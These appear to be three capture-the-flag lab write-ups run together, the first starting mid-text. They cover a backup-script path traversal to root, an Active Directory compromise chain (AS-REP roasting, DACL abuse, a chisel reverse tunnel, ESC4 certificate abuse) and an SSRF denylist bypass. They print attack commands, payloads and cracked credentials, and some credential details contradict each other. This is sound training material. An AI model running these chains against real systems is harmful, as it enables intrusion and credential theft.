2025/03/29 08:36:53 🍀 backy 1.2
2025/03/29 08:36:53 📋 Working with taskss.json ...
2025/03/29 08:36:53 💤 Nothing to sync
2025/03/29 08:36:53 📤 Archiving: [/var/../root]
2025/03/29 08:36:53 📥 To: /home/martin ...
2025/03/29 08:36:53 📦
tar: Removing leading `/var/../' from member names
/var/../root/
/var/../root/.ssh/
/var/../root/.ssh/id_rsa
/var/../root/.ssh/authorized_keys
/var/../root/root.txt
[... truncated ...]

Success! The entire root directory is now archived in /home/martin/.

Extracting Root Credentials

1
2
3
4
martin@code:~$ tar -xjf code_var_.._root_2025_March.tar.bz2
martin@code:~$ cd root/
martin@code:~/root$ cat root.txt
9234e99aacc8f86f70344547d6d1efab

Root Flag Captured! 🚩

Root SSH Access

We can also extract root’s SSH private key for persistent access:

1
martin@code:~/root$ cat .ssh/id_rsa

Copy the private key and connect:

1
2
chmod 600 id_rsa
ssh -i id_rsa root@10.10.11.62

Key Takeaways

Vulnerabilities Exploited

1. Server-Side Template Injection (SSTI) in Jinja2
   • Allowed arbitrary Python code execution
   • Enabled database enumeration and credential extraction
2. Insecure Path Validation in backup script
   • Path traversal bypass via /var/../root/
   • Logic flaw: validation before normalization
3. Unrestricted Sudo Permissions
   • User could execute backup script as root
   • No proper input sanitization

Lessons Learned

Never trust user-supplied input in template rendering. Always use safe alternatives like render_template() with proper context isolation.

Path validation must normalize paths before checking against allowlists. Use realpath() or similar functions to resolve symbolic links and relative paths.

Mitigation Recommendations

• For SSTI: Use sandboxed template environments or avoid render_template_string() entirely
• For Path Traversal: Implement proper path canonicalization before validation
• For Sudo Permissions: Apply principle of least privilege and validate all inputs rigorously

Tools Used

• Nmap - Port scanning and service enumeration
• CrackStation - Hash cracking
• jq - JSON processing (used by target system)
• Python - SSTI payload crafting

Conclusion

Code was an excellent machine for practicing SSTI exploitation and understanding the nuances of path traversal vulnerabilities. The escalation path demonstrated how seemingly small oversights in validation logic can lead to complete system compromise.

Final Stats:

• ⏱️ Time to User: ~30 minutes
• ⏱️ Time to Root: ~45 minutes
• 🎯 Difficulty Rating: Easy/Medium

Thanks for reading! Feel free to reach out if you have questions about this writeup.

Happy Hacking! 🚀

Reconnaissance

Nmap Scan

Starting with a full port scan:

1
nmap -sCV -oN nmapInfiltrator -v -p- 10.10.11.31

Key Ports:

1
2
3
4
5
6
7
8
9
10
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP
445/tcp   open  microsoft-ds?
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)

This is clearly an Active Directory Domain Controller. Domain name is infiltrator.htb and the DC is dc01.infiltrator.htb.

Web Enumeration

Checking the website on port 80, I found some employee names:

Employee names found on the website

1
2
3
4
5
6
david anderson
olivia martinez
kevin turner
amanda walker
marcus harris
lauren clark

Let’s generate possible usernames using username-anarchy:

1
~/tools/username-anarchy/username-anarchy -i username_raw > username.list

Initial Access

Kerberos Enumeration

Using kerbrute to validate usernames:

Found valid usernames

AS-REP Roasting

Let’s try to get some hashes without authentication:

1
GetNPUsers.py -debug infiltrator.htb/ -request -usersfile usernames.list

Got a hash for l.clark

Cracking the hash:

Successfully cracked the password

1
l.clark:WAT?watismypass!

Let’s verify it works:

1
nxc smb 10.10.11.31 -u l.clark -p 'WAT?watismypass!'

1
SMB  10.10.11.31  445  DC01  [+] infiltrator.htb\l.clark:WAT?watismypass!

BloodHound Analysis

Time to walk the dog! Let’s collect data and analyze the domain.

Found something in a user description

Password hint in description

Found k.turner’s password: MessengerApp@Pass! - but it doesn’t work directly.

Looking further in BloodHound:

d.anderson uses the same password

Let’s get a ticket for d.anderson and use Kerberos auth:

1
2
export KRB5CCNAME=d.anderson.ccache
nxc smb 10.10.11.31 --use-kcache

1
SMB  10.10.11.31  445  DC01  [+] infiltrator.htb\d.anderson from ccache

DACL Abuse Chain

Anderson has GenericAll on Marketing Digital OU

Anderson has GenericAll on the Marketing Digital OU, and e.rodriguez is in this OU. We can abuse this to change rodriguez’s password.

Using dacledit to grant ourselves FullControl:

1
2
3
dacledit.py -action 'write' -rights 'FullControl' -inheritance -principal 'd.anderson' \
  -target-dn 'OU=MARKETING DIGITAL,DC=INFILTRATOR,DC=HTB' \
  'infiltrator.htb/d.anderson' -k -no-pass -dc-ip dc01.INFILTRATOR.HTB

Changing rodriguez’s password

Now change rodriguez’s password:

1
2
3
bloodyAD --host "dc01.infiltrator.htb" -d "infiltrator.htb" --kerberos \
  --dc-ip dc01.INFILTRATOR.HTB -u "d.anderson" -p 'WAT?watismypass!' \
  set password "E.RODRIGUEZ" "Password@123"

Moving Through the Domain

Rodriguez can add self to Chiefs Marketing

Add rodriguez to Chiefs Marketing:

1
2
bloodyAD -d infiltrator.htb -u 'E.rodriguez' -p 'Pwnedcake@2006' \
  --host dc01.infiltrator.htb add groupMember 'Chiefs Marketing' 'E.rodriguez'

Chiefs Marketing can change M.harris’s password

Harris is in Remote Users group

Change Harris’s password:

1
2
bloodyAD --host "dc01.infiltrator.htb" -d "infiltrator.htb" \
  -u "E.rodriguez" -p "Pwnedcake@2006" set password "M.harris" "Pwnedcake@2006"

Pass the Ticket

Since NTLM auth is blocked, we need to use Kerberos:

NTLM authentication blocked

Edit /etc/krb5.conf:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
[libdefaults]
    default_realm = INFILTRATOR.HTB
    dns_lookup_kdc = false
    dns_lookup_realm = false

[realms]
    INFILTRATOR.HTB = {
        kdc = 10.10.11.31
        admin_server = 10.10.11.31
    }

[domain_realm]
    .infiltrator.htb = INFILTRATOR.HTB
    infiltrator.htb = INFILTRATOR.HTB

Get a ticket and login:

1
2
3
getTGT.py infiltrator.htb/M.HARRIS:'Pwnedcake@2006' -dc-ip 'dc01.infiltrator.htb'
export KRB5CCNAME=ticket.ccache
evil-winrm -i dc01.infiltrator.htb -r infiltrator.htb

User Flag Captured!

Root - Output Messenger Exploitation

Finding Internal Services

Using a C2 (Sliver) for stability, let’s check what’s running:

Found Output Messenger services on ports 14118-14130

Located the application

Port Forwarding

Using chisel to forward the ports:

1
2
3
4
5
6
7
# On attacker
chisel server -p 9999 --reverse

# On target
chisel.exe client 10.10.14.172:9999 R:14121:127.0.0.1:14121 \
  R:14122:127.0.0.1:14122 R:14123:127.0.0.1:14123 \
  R:14124:127.0.0.1:14124 R:14125:127.0.0.1:14125 R:14126:127.0.0.1:14126

Chisel tunnel established

Output Messenger Desktop Client

Remember the credentials k.turner:MessengerApp@Pass!? Let’s try them in the Output Messenger client.

Output Wall showing messages

Found some credentials posted on the wall:

Credentials shared on Output Wall

Credentials work

Extracting UserExplorer.exe

Logging in as harris, there’s a file shared in admin’s chat:

UserExplorer.exe in admin chat

Downloaded the executable

Reverse Engineering with ILSpy

The file is a .NET assembly. Let’s decompile it:

Found LdapApp function

Hardcoded encrypted credentials

Decryption function available

I wrote a Python script to decrypt the credentials:

1
2
3
4
5
6
7
8
9
10
11
12
13
import base64
from Crypto.Cipher import AES

def decrypt_string(key: str, cipher_text: str) -> str:
    key_bytes = key.encode("utf-8")
    cipher_bytes = base64.b64decode(cipher_text)
    cipher = AES.new(key_bytes, AES.MODE_CBC, iv=bytes(16))
    decrypted = cipher.decrypt(cipher_bytes).decode("utf-8")
    return decrypted.rstrip()

key = "b14ca5898a4e4133bbce2ea2315a1916"
cipher_text = input("Enter Base64 Ciphertext: ")
print(f"Decrypted: {decrypt_string(key, cipher_text)}")

Got winrm_svc credentials

1
winrm_svc:WinRm@$svc^!^P

API Enumeration

Found an API key in winrm_svc’s notes:

API key for Output Messenger

1
lan_management: 558R501T5I6024Y8JV3B7KOUN1A518GG

Using the API to enumerate chatrooms:

Found Chiefs_Marketing_chat

Extracting the database from winrm_svc’s Output Messenger folder:

Found room key in SQLite database

Using the API to read chat logs:

1
/api/chatrooms/logs?roomkey=20240220014618@conference.com&fromdate=2023/01/01&todate=2024/12/01

Recovered chat with martinez’s password

1
O.martinez : m@rtinez@1996!

Calendar Remote Code Execution

The Windows client has a calendar feature that can run applications:

Calendar with Run Application feature

After setting up a scheduled task with our payload:

Got shell as o.martinez

PCAP Analysis

Found a pcap file in martinez’s Output Messenger folder:

PCAP file found

Analyzing in Wireshark:

Found martinez’s actual password in traffic

1
O.martinez:M@rtinez_P@ssw0rd!

Also found a BitLocker backup file. Extracting and cracking it:

1
2
7z2john BitLocker_backup.7z > BitLocker_backup.7z.hash
john BitLocker_backup.7z.hash --wordlist=/usr/share/wordlists/rockyou.txt

1
zipper           (BitLocker_backup.7z)

Found recovery key

RDP and Registry Extraction

Using RDP to access martinez with the BitLocker drive:

1
xfreerdp /u:o.martinez /p:M@rtinez_P@ssw0rd! /v:10.10.11.31 /cert:ignore

Unlocking the BitLocker drive

Found SYSTEM and SECURITY registry hives:

Registry files extracted

Also found an NTDS.dit file. Analyzing it with sqlite:

Found lan_managment password

1
lan_managment:l@n_M@an!1331

ADCS ESC4 Attack

GMSA Password Reading

Looking at BloodHound, lan_managment can read the GMSA password:

GMSA password readable

1
2
bloodyAD --host "dc01.infiltrator.htb" -d "infiltrator.htb" -k \
  -u "lan_managment" -p 'l@n_M@an!1331' get object 'infiltrator_svc$' --attr msDS-ManagedPassword

Got the NTLM hash

Or using netexec:

1
nxc ldap dc01.infiltrator.htb -u lan_managment -p 'l@n_M@an!1331' --gmsa

GMSA hash extracted

ADCS Enumeration

Running certipy to find vulnerable templates:

Found ESC4 vulnerable template

Infiltrator_Template is vulnerable

Exploiting ESC4

First, modify the template:

1
2
3
certipy template -u 'infiltrator_svc$@infiltrator.htb' \
  -hashes ':91f6a2f300330325d5887462d4072732' \
  -template Infiltrator_Template -debug

Template modified

Request a certificate as Administrator:

1
2
3
4
5
certipy req -u 'infiltrator_svc$@infiltrator.htb' \
  -hashes ':91f6a2f300330325d5887462d4072732' \
  -dc-ip 10.10.11.31 -target "dc01.infiltrator.htb" \
  -ca 'infiltrator-DC01-CA' -template 'Infiltrator_Template' \
  -upn 'administrator@infiltrator.htb' -debug

Got Administrator’s certificate

Authenticate with the certificate:

1
certipy auth -pfx administrator.pfx

Got Administrator’s NTLM hash

Final pass-the-hash:

Domain Admin achieved!

Root Flag Captured!

Attack Chain Summary

1. Enumerate users from website and validate with Kerbrute
2. AS-REP roast l.clark and crack the hash
3. BloodHound reveals password hints in user descriptions
4. DACL abuse chain: anderson → rodriguez → harris
5. Pass-the-ticket to get shell as harris
6. Output Messenger exploitation through desktop client
7. Reverse engineer UserExplorer.exe for credentials
8. API enumeration to read chat logs
9. Calendar RCE for shell as martinez
10. PCAP analysis for more credentials
11. BitLocker drive contains registry hives
12. GMSA password reading for service account
13. ADCS ESC4 attack for Domain Admin

Key Takeaways

Vulnerabilities Exploited

1. AS-REP Roasting - l.clark had pre-authentication disabled
2. Sensitive Data in Descriptions - Passwords in AD user descriptions
3. DACL Misconfiguration - GenericAll on OU allowed privilege escalation
4. Output Messenger - Calendar feature allowed code execution
5. GMSA Password Readable - Service account hash extractable
6. ADCS ESC4 - Misconfigured certificate template

Lessons Learned

Never store passwords in user descriptions or comments. Use a proper secret management solution.

ADCS misconfigurations are extremely common and dangerous. Regular audits with tools like Certipy are essential.

Internal messaging applications can be attack vectors. Audit what data is shared through them.

Tools Used

• Nmap - Port scanning
• Kerbrute - Username enumeration
• Impacket - Kerberos attacks, secretsdump
• BloodHound - AD attack path analysis
• BloodyAD - AD exploitation
• Certipy - ADCS enumeration and exploitation
• Chisel - Port forwarding
• ILSpy - .NET decompilation
• Wireshark - PCAP analysis
• Evil-WinRM - Windows remote management

Conclusion

Infiltrator is one of the best machines I’ve done. It’s a proper Active Directory box that tests everything from initial enumeration to complex privilege escalation chains. The Output Messenger part was unique and the ADCS finale was satisfying.

This machine teaches you:

• How real AD environments get compromised
• The importance of BloodHound in finding attack paths
• How DACL misconfigurations can chain together
• Why ADCS needs proper configuration

Final Stats:

• Time to User: ~8 hours
• Time to Root: ~6 hours
• Difficulty Rating: Insane (Truly Insane)

Thanks for reading! Happy Hacking!

Challenge Overview

ProxyAsAService is a web challenge that presents a proxy service designed to fetch content from Reddit on behalf of users. The application implements security measures to prevent Server-Side Request Forgery (SSRF) attacks by restricting access to local URLs. However, these protections can be bypassed through creative URL manipulation.

Our goal is to exploit the proxy service to access internal debug endpoints and extract the flag stored in environment variables.

Initial Reconnaissance

Web Interface

Accessing the challenge at http://94.237.54.42:55319, we’re presented with a proxy service that redirects to various cat-related subreddits by default. The application accepts a url parameter to specify which Reddit page to fetch.

Default behavior:

1
2
http://94.237.54.42:55319/
→ Redirects to /r/cats/ or similar cat subreddits

The challenge provides source code for analysis, which is crucial for understanding the application’s security mechanisms.

Source Code Analysis

Dockerfile

Examining the Dockerfile reveals our primary objective:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
FROM python:3-alpine

# Install packages
RUN apk add --update --no-cache libcurl curl-dev build-base supervisor

# Upgrade pip
RUN python -m pip install --upgrade pip

# Install dependencies
RUN pip install Flask requests

# Setup app
RUN mkdir -p /app

# Switch working environment
WORKDIR /app

# Add application
COPY challenge .

# Setup supervisor
COPY config/supervisord.conf /etc/supervisord.conf

# Expose port the server is reachable on
EXPOSE 1337

# Disable pycache
ENV PYTHONDONTWRITEBYTECODE=1

# Place flag in environ
ENV FLAG=HTB{f4k3_fl4g_f0r_t3st1ng}

# Run supervisord
CMD ["/usr/bin/supervisord", "-c", "/etc/supervisord.conf"]

Key Finding: The flag is stored as an environment variable called FLAG

Application Structure

1
grep -iR "HTB" .

Output:

1
./Dockerfile:ENV FLAG=HTB{f4k3_fl4g_f0r_t3st1ng}

The application runs on port 1337 internally:

1
2
# run.py
app.run(host='0.0.0.0', port=1337)

routes.py Analysis

The main proxy route handles user requests:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
SITE_NAME = 'reddit.com'

proxy_api = Blueprint('proxy_api', __name__)
debug     = Blueprint('debug', __name__)

@proxy_api.route('/', methods=['GET', 'POST'])
def proxy():
    url = request.args.get('url')

    if not url:
        cat_meme_subreddits = [
            '/r/cats/',
            '/r/catpictures',
            '/r/catvideos/'
        ]
        random_subreddit = random.choice(cat_meme_subreddits)
        return redirect(url_for('.proxy', url=random_subreddit))
    
    target_url = f'http://{SITE_NAME}{url}'
    response, headers = proxy_req(target_url)

    return Response(response.content, response.status_code, headers.items())

Important observations:

1. The application expects subreddit paths like /r/cybersecurity
2. It prepends reddit.com to all URLs: http://reddit.com{url}
3. This URL construction is exploitable!

Debug Endpoint Discovery

A critical debug route exists in the application:

1
2
3
4
5
6
7
8
@debug.route('/environment', methods=['GET'])
@is_from_localhost
def debug_environment():
    environment_info = {
        'Environment variables': dict(os.environ),
        'Request headers': dict(request.headers)
    }
    return jsonify(environment_info)

Key points:

• Route: /debug/environment
• Returns: All environment variables (including the flag!)
• Protection: @is_from_localhost decorator

Debug endpoint that exposes environment variables

util.py - Security Restrictions

The application implements two security mechanisms:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
RESTRICTED_URLS = ['localhost', '127.', '192.168.', '10.', '172.']

def is_safe_url(url):
    for restricted_url in RESTRICTED_URLS:
        if restricted_url in url:
            return False
    return True

def is_from_localhost(func):
    @functools.wraps(func)
    def check_ip(*args, **kwargs):
        if request.remote_addr != '127.0.0.1':
            return abort(403)
        return func(*args, **kwargs)
    return check_ip

Security mechanisms attempting to prevent SSRF

Understanding the Vulnerabilities

Challenge 1: Bypassing the Denylist

The RESTRICTED_URLS denylist blocks common localhost representations:

• localhost
• 127. (catches 127.0.0.1, 127.0.0.2, etc.)
• 192.168. (private network)
• 10. (private network)
• 172. (private network)

The Problem: Denylists are inherently incomplete! There are many alternative representations of localhost that aren’t blocked.

Challenge 2: Controlling the Target URL

The application constructs URLs as:

1
2
target_url = f'http://{SITE_NAME}{url}'
# Results in: http://reddit.com{user_input}

We need to bypass this to control the entire URL, not just append to reddit.com.

Exploitation Strategies

Researching Bypass Techniques

Consulting HackTricks SSRF documentation:

Various techniques for bypassing URL restrictions

Strategy 1: The @ Symbol Authentication Bypass (Primary Method)

The most elegant solution exploits URL authentication syntax:

Standard URL format:

1
http://username:password@host:port/path

Our exploit:

1
http://reddit.com@0.0.0.0:1337/debug/environment

How it works:

1. The application constructs: http://reddit.com@0.0.0.0:1337/debug/environment
2. URL parsers interpret reddit.com as authentication credentials
3. The actual target host becomes 0.0.0.0:1337
4. 0.0.0.0 is NOT in the denylist (only 127., localhost, etc.)
5. Request goes to the internal service on port 1337!

Exploitation

Primary Method: @ Symbol Bypass

Payload construction:

1
/?url=@0.0.0.0:1337/debug/environment

Full URL:

1
http://94.237.54.42:55319/?url=@0.0.0.0:1337/debug/environment

What happens:

1. Application receives: @0.0.0.0:1337/debug/environment
2. Constructs: http://reddit.com@0.0.0.0:1337/debug/environment
3. Denylist check passes (no localhost, 127., etc.)
4. HTTP client interprets 0.0.0.0:1337 as the target
5. Request goes to internal debug endpoint
6. Since it’s from localhost (internal request), bypasses @is_from_localhost

Executing the Attack

Using curl:

1
curl "http://94.237.54.42:55319/?url=@0.0.0.0:1337/debug/environment"

Using browser: Simply navigate to:

1
http://94.237.54.42:55319/?url=@0.0.0.0:1337/debug/environment

Success - Flag Captured!

Successfully bypassed restrictions and retrieved environment variables

Flag Captured! 🚩 HTB{pr0xy_s3rv1c3s_4r3_fun_t0_byp4ss}

Technical Deep Dive

Why the @ Symbol Works

The @ symbol in URLs separates authentication credentials from the host:

1
scheme://[user[:password]@]host[:port][/path][?query][#fragment]

Example breakdown:

1
2
3
4
http://reddit.com@0.0.0.0:1337/debug/environment
         \_____/  \_____________/\_______________/
            |            |              |
        username      actual host    path

Different components interpret this differently:

• String-based filter: Sees the entire string, 0.0.0.0 not in denylist ✓
• HTTP client: Correctly parses 0.0.0.0:1337 as the target host
• Result: Request goes to internal service!

Understanding 0.0.0.0

0.0.0.0 is a special meta-address that means “all IPv4 addresses on the local machine”:

• In server contexts: Bind to all interfaces
• In client contexts: Often resolves to 127.0.0.1
• Crucially: Not in the RESTRICTED_URLS denylist!

Alternative Localhost Representations

Other representations that bypass the denylist:

Prevention & Mitigation

Why This Vulnerability Exists

1. Denylist Approach: Trying to block “bad” inputs instead of allowing “good” ones
2. String Matching: Checking URL strings instead of resolved values
3. URL Construction: Allowing user input to control authentication portion
4. Exposed Debug Endpoints: Development routes accessible in production

Recommended Mitigations

1. Use Allowlists, Not Denylists

Always prefer allowlists over denylists. Explicitly define what IS allowed rather than what ISN’T.

1
2
3
4
5
6
7
8
9
10
# ❌ Vulnerable: Denylist approach
RESTRICTED_URLS = ['localhost', '127.', '192.168.']
if any(r in url for r in RESTRICTED_URLS):
    return False

# ✅ Secure: Allowlist approach
ALLOWED_DOMAINS = ['reddit.com', 'old.reddit.com']
parsed = urlparse(url)
if parsed.hostname not in ALLOWED_DOMAINS:
    return False

2. Validate After DNS Resolution

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
import socket
import ipaddress
from urllib.parse import urlparse

def is_safe_url(url):
    try:
        parsed = urlparse(url)
        
        # Resolve hostname to IP
        ip = socket.gethostbyname(parsed.hostname)
        ip_obj = ipaddress.ip_address(ip)
        
        # Block private/loopback IPs
        if (ip_obj.is_private or 
            ip_obj.is_loopback or 
            ip_obj.is_reserved):
            return False
            
        return True
    except:
        return False

3. Avoid Dynamic URL Construction

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
# ❌ Vulnerable: User controls URL structure
target_url = f'http://{SITE_NAME}{user_input}'

# ✅ Better: Parse and validate first
parsed = urlparse(user_input)
if parsed.hostname == SITE_NAME:
    target_url = user_input
else:
    return "Invalid domain"

# ✅ Best: Use allowlist with path only
if user_input.startswith('/r/'):
    target_url = f'http://{SITE_NAME}{user_input}'
else:
    return "Invalid path"

4. Remove Debug Endpoints in Production

1
2
3
4
5
6
7
8
9
10
11
12
# ❌ Never expose debug routes
@app.route('/debug/environment')
def debug_environment():
    return jsonify(dict(os.environ))

# ✅ Only register in development
if app.debug:
    @app.route('/debug/environment')
    def debug_environment():
        return jsonify(dict(os.environ))

# ✅✅ Better: Remove entirely from production code

5. Implement Proper Authentication

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
from functools import wraps
from flask import request, abort
import secrets

# Use secure token-based authentication
DEBUG_TOKEN = secrets.token_urlsafe(32)

def require_debug_token(f):
    @wraps(f)
    def decorated_function(*args, **kwargs):
        token = request.headers.get('X-Debug-Token')
        if not token or token != DEBUG_TOKEN:
            abort(403)
        return f(*args, **kwargs)
    return decorated_function

@app.route('/debug/environment')
@require_debug_token
def debug_environment():
    return jsonify(dict(os.environ))

6. Network Segmentation

• Run application services in isolated networks
• Use firewalls to restrict internal service access
• Implement zero-trust architecture

Tools & Resources

Tools Used

• curl - HTTP request testing
• Browser DevTools - Manual testing
• Python requests - Automation script
• HackTricks - SSRF bypass reference

Helpful Resources

• HackTricks - SSRF URL Format Bypass
• PortSwigger - SSRF
• OWASP - SSRF Prevention
• RFC 3986 - URI Syntax

Thanks for reading! Feel free to reach out if you have questions about SSRF, URL parsing, or web application security.

Happy Hacking! 🚀